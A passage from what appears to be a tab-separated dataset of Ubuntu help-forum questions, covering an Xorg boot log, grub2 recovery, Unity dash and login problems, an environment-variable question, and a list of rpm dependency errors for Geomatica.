/usr/lib/xorg/modules/extensions/libextmod.so [ 7.233 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 7.233 ] compiled for 1.10.1 , module version = 1.0.0 [ 7.233 ] module class : x.org server extension [ 7.233 ] abi class : x.org server extension , version 5.0 [ 7.233 ] ( ii ) loading extension mit-screen-saver [ 7.233 ] ( ii ) loading extension xfree86-vidmodeextension [ 7.233 ] ( ii ) loading extension xfree86-dga [ 7.233 ] ( ii ) loading extension dpms [ 7.233 ] ( ii ) loading extension xvideo [ 7.233 ] ( ii ) loading extension xvideo-motioncompensation [ 7.233 ] ( ii ) loading extension x-resource [ 7.233 ] ( ii ) loadmodule : `` dbe '' [ 7.233 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 7.233 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 7.233 ] compiled for 1.10.1 , module version = 1.0.0 [ 7.233 ] module class : x.org server extension [ 7.233 ] abi class : x.org server extension , version 5.0 [ 7.233 ] ( ii ) loading extension double-buffer [ 7.233 ] ( ii ) loadmodule : `` glx '' [ 7.233 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 7.312 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 7.313 ] compiled for 4.0.2 , module version = 1.0.0 [ 7.313 ] module class : x.org server extension [ 7.313 ] ( ii ) nvidia glx module 280.13 wed jul 27 17:12:07 pdt 2011 [ 7.313 ] ( ii ) loading extension glx [ 7.313 ] ( ii ) loadmodule : `` record '' [ 7.314 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 7.314 ] ( ii ) module record : vendor= '' x.org foundation '' [ 7.314 ] compiled for 1.10.1 , module version = 1.13.0 [ 7.314 ] module class : x.org server extension [ 7.314 ] abi class : x.org server extension , version 5.0 [ 7.314 ] ( ii ) loading extension record [ 7.314 ] ( ii ) loadmodule : `` dri '' [ 7.314 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 7.314 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 7.314 ] compiled for 1.10.1 , module version = 1.0.0 [ 7.314 ] abi class : x.org server extension , version 5.0 [ 7.314 ] ( ii ) loading extension xfree86-dri [ 7.314 ] ( ii ) loadmodule : `` dri2 '' [ 7.315 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 7.315 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 7.315 ] compiled for 1.10.1 , module version = 1.2.0 [ 7.315 ] abi class : x.org server extension , version 5.0 [ 7.315 ] ( ii ) loading extension dri2 [ 7.315 ] ( == ) matched intel as autoconfigured driver 0 [ 7.315 ] ( == ) matched vesa as autoconfigured driver 1 [ 7.315 ] ( == ) matched fbdev as autoconfigured driver 2 [ 7.315 ] ( == ) assigned the driver to the xf86configlayout [ 7.315 ] ( ii ) loadmodule : `` intel '' [ 7.317 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 7.322 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 7.322 ] compiled for 1.10.1 , module version = 2.14.0 [ 7.322 ] module class : x.org video driver [ 7.322 ] abi class : x.org video driver , version 10.0 [ 7.322 ] ( ii ) loadmodule : `` vesa '' [ 7.323 ] ( ww ) warning , could n't open module vesa [ 7.323 ] ( ii ) unloadmodule : `` vesa '' [ 7.323 ] ( ii ) unloading vesa [ 7.323 ] ( ee ) failed to load module `` vesa '' ( module does not exist , 0 ) [ 7.323 ] ( ii ) loadmodule : `` fbdev '' [ 7.323 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 7.324 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 7.324 ] compiled for 1.10.0 , module version = 0.4.2 [ 7.325 ] abi class : x.org video driver , version 10.0 [ 7.325 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , b43 , clarkdale , arrandale , sandybridge , sandybridge , sandybridge , sandybridge , sandybridge , sandybridge , sandybridge [ 7.325 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 7.325 ] ( ++ ) using vt number 7 [ 7.327 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 7.327 ] ( ww ) falling back to old probe method for fbdev [ 7.327 ] ( ii ) loading sub module `` fbdevhw '' [ 7.327 ] ( ii ) loadmodule : `` fbdevhw '' [ 7.327 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 7.327 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 7.327 ] compiled for 1.10.1 , module version = 0.0.2 [ 7.327 ] abi class : x.org video driver , version 10.0 [ 7.328 ] drmopendevice : node name is /dev/dri/card0 [ 7.328 ] drmopendevice : open result is 9 , ( ok ) [ 7.328 ] drmopenbybusid : searching for busid pci:0000:00:02.0 [ 7.328 ] drmopendevice : node name is /dev/dri/card0 [ 7.328 ] drmopendevice : open result is 9 , ( ok ) [ 7.328 ] drmopenbybusid : drmopenminor returns 9 [ 7.328 ] drmopenbybusid : drmgetbusid reports pci:0000:00:02.0 [ 7.328 ] ( ii ) intel ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 7.328 ] ( == ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 7.328 ] ( == ) intel ( 0 ) : rgb weight 888 [ 7.328 ] ( == ) intel ( 0 ) : default visual is truecolor [ 7.328 ] ( ii ) intel ( 0 ) : integrated graphics chipset : intel ( r ) sandybridge [ 7.328 ] ( -- ) intel ( 0 ) : chipset : `` sandybridge '' [ 7.328 ] ( ** ) intel ( 0 ) : relaxed fencing enabled [ 7.328 ] ( ** ) intel ( 0 ) : tiling enabled [ 7.328 ] ( ** ) intel ( 0 ) : swapbuffers wait disabled [ 7.328 ] ( == ) intel ( 0 ) : video overlay key set to 0x101fe [ 7.328 ] ( ii ) intel ( 0 ) : output lvds1 has no monitor section [ 7.328 ] ( ii ) intel ( 0 ) : found backlight control interface /sys/class/backlight/acpi_video1 [ 7.328 ] ( ii ) intel ( 0 ) : output vga1 has no monitor section [ 7.328 ] ( ii ) intel ( 0 ) : edid for output lvds1 [ 7.328 ] ( ii ) intel ( 0 ) : manufacturer : sec model : 324c serial # : 0 [ 7.328 ] ( ii ) intel ( 0 ) : year : 2010 week : 0 [ 7.328 ] ( ii ) intel ( 0 ) : edid version : 1.3 [ 7.328 ] ( ii ) intel ( 0 ) : digital display input [ 7.328 ] ( ii ) intel ( 0 ) : max image size [ cm ] : horiz . : 31 vert . : 17 [ 7.328 ] ( ii ) intel ( 0 ) : gamma : 2.20 [ 7.328 ] ( ii ) intel ( 0 ) : dpms capabilities : standby suspend off [ 7.328 ] ( ii ) intel ( 0 ) : supported color encodings : rgb 4:4:4 ycrcb 4:4:4 [ 7.328 ] ( ii ) intel ( 0 ) : first detailed timing is preferred mode [ 7.328 ] ( ii ) intel ( 0 ) : redx : 0.566 redy : 0.337 greenx : 0.351 greeny : 0.560 [ 7.328 ] ( ii ) intel ( 0 ) : bluex : 0.150 bluey : 0.094 whitex : 0.313 whitey : 0.329 [ 7.328 ] ( ii ) intel ( 0 ) : manufacturer 's mask : 0 [ 7.328 ] ( ii ) intel ( 0 ) : supported detailed timing : [ 7.328 ] ( ii ) intel ( 0 ) : clock : 98.2 mhz image size : 310 x 174 mm [ 7.328 ] ( ii ) intel ( 0 ) : h_active : 1600 h_sync : 1648 h_sync_end 1680 h_blank_end 1760 h_border : 0 [ 7.328 ] ( ii ) intel ( 0 ) : v_active : 900 v_sync : 902 v_sync_end 907 v_blanking : 930 v_border : 0 [ 7.328 ] ( ii ) intel ( 0 ) : unknown vendor-specific block f [ 7.328 ] ( ii ) intel ( 0 ) : samsung [ 7.328 ] ( ii ) intel ( 0 ) : ltn140kt03401 [ 7.328 ] ( ii ) intel ( 0 ) : edid ( in hex ) : [ 7.328 ] ( ii ) intel ( 0 ) : 00ffffffffffff004ca34c3200000000 [ 7.328 ] ( ii ) intel ( 0 ) : 00140103801f1178ea1d859156598f26 [ 7.328 ] ( ii ) intel ( 0 ) : 18505400000001010101010101010101 [ 7.328 ] ( ii ) intel ( 0 ) : 0101010101015d2640a060841e303020 [ 7.328 ] ( ii ) intel ( 0 ) : 250036ae100000190000000f00000000 [ 7.328 ] ( ii ) intel ( 0 ) : 000000000032c8043200000000fe0053 [ 7.328 ] ( ii ) intel ( 0 ) : 414d53554e470a204ca34b54000000fe [ 7.328 ] ( ii ) intel ( 0 ) : 004c544e3134304b54303334303100ca [ 7.328 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12876 [ 7.328 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 7.328 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x0.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 320x240 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 400x300 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 400x300 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 512x384 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 640x480 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 640x512 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 800x600 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 896x672 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 928x696 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 960x720 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 576x432 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 680x384 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 680x384 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 700x525 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 720x450 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 800x512 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 840x525 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 840x525 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 960x540 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 960x600 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : not using default mode `` 1024x768 '' ( doublescan mode not supported ) [ 7.329 ] ( ii ) intel ( 0 ) : printing probed modes for output lvds1 [ 7.329 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x60.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) [ 7.329 ] ( ii ) intel ( 0 ) : modeline `` 1440x900 '' x59.9 106.50 1440 1520 1672 1904 900 903 909 934 -hsync +vsync ( 55.9 khz ) [ 7.329 ] ( ii ) intel ( 0 ) : modeline `` 1360x768 '' x59.8 84.75 1360 1432 1568 1776 768 771 781 798 -hsync +vsync ( 47.7 khz ) [ 7.329 ] ( ii ) intel ( 0 ) : modeline `` 1360x768 '' x60.0 72.00 1360 1408 1440 1520 768 771 781 790 +hsync -vsync ( 47.4 khz ) [ 7.329 ] ( ii ) intel ( 0 ) : modeline `` 1152x864 '' x60.0 81.62 1152 1216 1336 1520 864 865 868 895 -hsync +vsync ( 53.7 khz ) [ 7.329 ] ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz ) [ 7.329 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz ) [ 7.329 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync ( 35.2 khz ) [ 7.329 ] ( ii ) intel ( 0 ) : modeline `` 640x480 '' x59.9 25.18 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz ) [ 7.329 ] ( ii ) intel ( 0 ) : edid for output vga1 [ 7.329 ] ( ii ) intel ( 0 ) : output lvds1 connected [ 7.329 ] ( ii ) intel ( 0 ) : output vga1 disconnected [ 7.329 ] ( ii ) intel ( 0 ) : using exact sizes for initial modes [ 7.329 ] ( ii ) intel ( 0 ) : output lvds1 using initial mode 1600x900 [ 7.329 ] ( ii ) intel ( 0 ) : using default gamma of ( 1.0 , 1.0 , 1.0 ) unless otherwise stated . [ 7.329 ] ( ii ) intel ( 0 ) : kernel page flipping support detected , enabling [ 7.329 ] ( ** ) intel ( 0 ) : display dimensions : ( 310 , 170 ) mm [ 7.329 ] ( ** ) intel ( 0 ) : dpi set to ( 131 , 134 ) [ 7.329 ] ( ii ) loading sub module `` fb '' [ 7.329 ] ( ii ) loadmodule : `` fb '' [ 7.329 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 7.331 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 7.331 ] compiled for 1.10.1 , module version = 1.0.0 [ 7.331 ] abi class : x.org ansi c emulation , version 0.4 [ 7.331 ] ( ii ) unloadmodule : `` fbdev '' [ 7.331 ] ( ii ) unloading fbdev [ 7.331 ] ( ii ) unloadmodule : `` fbdevhw '' [ 7.331 ] ( ii ) unloading fbdevhw [ 7.331 ] ( == ) depth 24 pixmap format is 32 bpp [ 7.331 ] ( == ) intel ( 0 ) : videoram : 262144 kb [ 7.331 ] ( ii ) intel ( 0 ) : [ dri2 ] setup complete [ 7.331 ] ( ii ) intel ( 0 ) : [ dri2 ] dri driver : i965 [ 7.331 ] ( ii ) intel ( 0 ) : allocated new frame buffer 1600x900 stride 6656 , tiled [ 7.334 ] ( ii ) uxa ( 0 ) : driver registered support for the following operations : [ 7.335 ] ( ii ) solid [ 7.335 ] ( ii ) copy [ 7.335 ] ( ii ) composite ( render acceleration ) [ 7.335 ] ( ii ) put_image [ 7.335 ] ( ii ) get_image [ 7.335 ] ( == ) intel ( 0 ) : backing store disabled [ 7.335 ] ( == ) intel ( 0 ) : silken mouse enabled [ 7.335 ] ( ii ) intel ( 0 ) : initializing hw cursor [ 7.400 ] ( ii ) intel ( 0 ) : randr 1.2 enabled , ignore the following randr disabled message . [ 7.401 ] ( == ) intel ( 0 ) : dpms enabled [ 7.401 ] ( == ) intel ( 0 ) : intel xvmc decoder enabled [ 7.401 ] ( ii ) intel ( 0 ) : set up textured video [ 7.401 ] ( ii ) intel ( 0 ) : [ xvmc ] xvmc_vld driver initialized . [ 7.401 ] ( ii ) intel ( 0 ) : direct rendering : dri2 enabled [ 7.401 ] ( == ) intel ( 0 ) : hotplug detection : `` enabled '' [ 7.401 ] ( -- ) randr disabled [ 7.401 ] ( ii ) initializing built-in extension generic event extension [ 7.401 ] ( ii ) initializing built-in extension shape [ 7.401 ] ( ii ) initializing built-in extension mit-shm [ 7.401 ] ( ii ) initializing built-in extension xinputextension [ 7.401 ] ( ii ) initializing built-in extension xtest [ 7.401 ] ( ii ) initializing built-in extension big-requests [ 7.402 ] ( ii ) initializing built-in extension sync [ 7.402 ] ( ii ) initializing built-in extension xkeyboard [ 7.402 ] ( ii ) initializing built-in extension xc-misc [ 7.402 ] ( ii ) initializing built-in extension security [ 7.402 ] ( ii ) initializing built-in extension xinerama [ 7.402 ] ( ii ) initializing built-in extension xfixes [ 7.402 ] ( ii ) initializing built-in extension render [ 7.402 ] ( ii ) initializing built-in extension randr [ 7.402 ] ( ii ) initializing built-in extension composite [ 7.402 ] ( ii ) initializing built-in extension damage [ 7.402 ] ( ii ) initializing built-in extension gesture [ 7.404 ] ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found ) [ 7.407 ] ( ii ) intel ( 0 ) : setting screen physical size to 423 x 238 [ 7.422 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 7.431 ] ( ii ) config/udev : adding input device power button ( /dev/input/event2 ) [ 7.431 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 7.431 ] ( ii ) loadmodule : `` evdev '' [ 7.431 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 7.433 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 7.433 ] compiled for 1.10.0.902 , module version = 2.6.0 [ 7.433 ] module class : x.org xinput driver [ 7.433 ] abi class : x.org xinput driver , version 12.3 [ 7.433 ] ( ii ) using input driver 'evdev ' for 'power button' [ 7.433 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 7.433 ] ( ** ) power button : always reports core events [ 7.433 ] ( ** ) power button : device : `` /dev/input/event2 '' [ 7.480 ] ( -- ) power button : found keys [ 7.480 ] ( ii ) power button : configuring as keyboard [ 7.926 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12876 [ 7.926 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 7.926 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x0.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) [ 7.926 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12876 [ 7.927 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 7.927 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x0.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) [ 7.927 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12876 [ 7.927 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 7.927 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x0.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) [ 7.928 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12876 [ 7.928 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 7.928 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x0.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) [ 14.024 ] ( ii ) config/udev : adding input device tpps/2 ibm trackpoint ( /dev/input/mouse1 ) [ 14.024 ] ( ii ) no input driver/identifier specified ( ignoring ) [ 14.028 ] ( ii ) config/udev : adding input device tpps/2 ibm trackpoint ( /dev/input/event9 ) [ 202.481 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12876 [ 202.482 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 202.482 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x0.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) [ 207.664 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12876 [ 207.665 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 207.665 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x0.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) [ 210.236 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12876 [ 210.236 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 210.236 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x0.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) [ 210.251 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12876 [ 210.251 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 210.251 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x0.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) [ 1456.762 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12876 [ 1456.762 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 1456.762 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x0.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) [ 3523.786 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12876 [ 3523.786 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 3523.786 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x0.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) [ 3832.025 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12876 [ 3832.025 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 3832.025 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x0.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) [ 4206.129 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12876 [ 4206.129 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 4206.129 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x0.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) [ 4928.781 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12876 [ 4928.781 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 4928.781 ] ( ii ) intel ( 0 ) : modeline `` 1600x900 '' x0.0 98.21 1600 1648 1680 1760 900 902 907 930 -hsync -vsync ( 55.8 khz ) enter code here help ! ! ! !
63844	how to recover grub2 ?	i installed ubuntu 11.10 and then after that , i upgraded my lubuntu 10.10 to 11.04 . the grub2 initiated through the installation overwrote the grub written by ubuntu . after that , i ca n't find any boot entries leading to ubuntu or windows 7 in the grub menu . how do i recover the grub2 which has all the menus ? here are the outputs for update-grub and fdisk -l update-grub : found linux image : /boot/vmlinuz-2.6.38-11-generic found initrd image : /boot/initrd.img-2.6.38-11-generic found linux image : /boot/vmlinuz-2.6.35-22-generic found initrd image : /boot/initrd.img-2.6.35-22-generic found memtest86+ image : /boot/memtest86+.bin fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x65728979 device boot start end blocks id system /dev/sda1 1 13 102400 de dell utility partition 1 does not end on cylinder boundary . /dev/sda2 * 13 1288 10240000 7 hpfs/ntfs /dev/sda3 1288 8937 61440000 7 hpfs/ntfs /dev/sda4 8937 38914 240786311 f w95 ext 'd ( lba ) /dev/sda5 8937 33999 201311607+ 7 hpfs/ntfs /dev/sda6 36442 38805 18979840 83 linux /dev/sda7 38805 38914 872448 82 linux swap / solaris /dev/sda8 33999 36334 18751488 83 linux /dev/sda9 36334 36442 863232 82 linux swap / solaris partition table entries are not in disk order
63846	what is the easiest way to launch dash with a single-touch screen and auto-hidden launcher ?	there is a lot of devices with a single-touch screen and the oneiric unity has no always-visible dash icon . so , how can i get it without keyboard providing that moving pointer to the edge is almost impossible on the majority of resistive touchscreens ? one way i know of is to use easystroke with button1 for gestures and short timeout . did n't try win-button emulation yet but there is a cli way : is there a way to launch unity dash outside of unity ? another ways you know of such as easy taskbar-icon creation ?
63847	when i type in terminal : export jdk_home= '' /usr/lib/jvm/java-6-sun/ '' , where does it get stored ?	i have tried multiple locations , but with no luck of finding where was it added : .bashrc .bash_profile /etc/profile /etc/environment .profile when i do echo $ jdk_home , i get what i expect /usr/lib/jvm/java-6-sun/ , but i am dying to know where is it located ? ( in case i 'd like to change it )
63850	unity not working in default user account	i have been using oneiric since beta 1 release . after yesterday 's update unity has stopped appearing . i did update a few minutes back too , but still it 's not working with my default account . surprisingly it works with 'guest ' login and a new administrator type account which i am using now . in my default account i am greeted with a blank screen . going to tty1 and typing unity or unity -- reset did not make any difference .
63851	how do i install geomatica ?	i wanted to try the latest version ( trial ) of geomatica , geomatica 2012 on ubuntu 11.10 beta . when i tried to run the bin file i got a whole list of dependencies . it also seems that it is a rpm package . instead of going through each entry manually , is there any easy way to search and install a list of dependencies ? here is the list what i got - rpm : rpm should not be used directly install rpm packages , use alien instead ! rpm : however assuming you know what you are doing ... error : failed dependencies : glibc > = 2.9 is needed by geomatica-2012-12.0-0.x86_64 libstdc++43 is needed by geomatica-2012-12.0-0.x86_64 libgcc43 is needed by geomatica-2012-12.0-0.x86_64 libgomp43 is needed by geomatica-2012-12.0-0.x86_64 libgfortran43 is needed by geomatica-2012-12.0-0.x86_64 openmotif-libs > = 2.3.1 is needed by geomatica-2012-12.0-0.x86_64 /bin/sh is needed by geomatica-2012-12.0-0.x86_64 libatk-1.0.so.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libcairo.so.2 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libcrypto.so.0.9.8 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libcrypt.so.1 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libc.so.6 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libc.so.6 ( glibc_2.2.5 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libc.so.6 ( glibc_2.3.2 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libc.so.6 ( glibc_2.3.4 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libc.so.6 ( glibc_2.3 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libc.so.6 ( glibc_2.7 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libdl.so.2 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libdl.so.2 ( glibc_2.2.5 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libexpat.so.1 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libfontconfig.so.1 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgcc_s.so.1 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgcc_s.so.1 ( gcc_3.0 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgcc_s.so.1 ( gcc_4.0.0 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgdk_pixbuf-2.0.so.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgdk-x11-2.0.so.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgd.so.2 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgfortran.so.3 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgfortran.so.3 ( gfortran_1.0 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgio-2.0.so.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libglib-2.0.so.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgl.so.1 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgmodule-2.0.so.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgobject-2.0.so.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgomp.so.1 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgomp.so.1 ( gomp_1.0 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgomp.so.1 ( omp_1.0 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgthread-2.0.so.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libgtk-x11-2.0.so.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libjpeg.so.62 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libm.so.6 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libm.so.6 ( glibc_2.2.5 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libnsl.so.1 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libpango-1.0.so.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libpangocairo-1.0.so.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libpangoft2-1.0.so.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libpng12.so.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libpng12.so.0 ( png12_0 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libpthread.so.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libpthread.so.0 ( glibc_2.2.5 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libpthread.so.0 ( glibc_2.3.2 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libpthread.so.0 ( 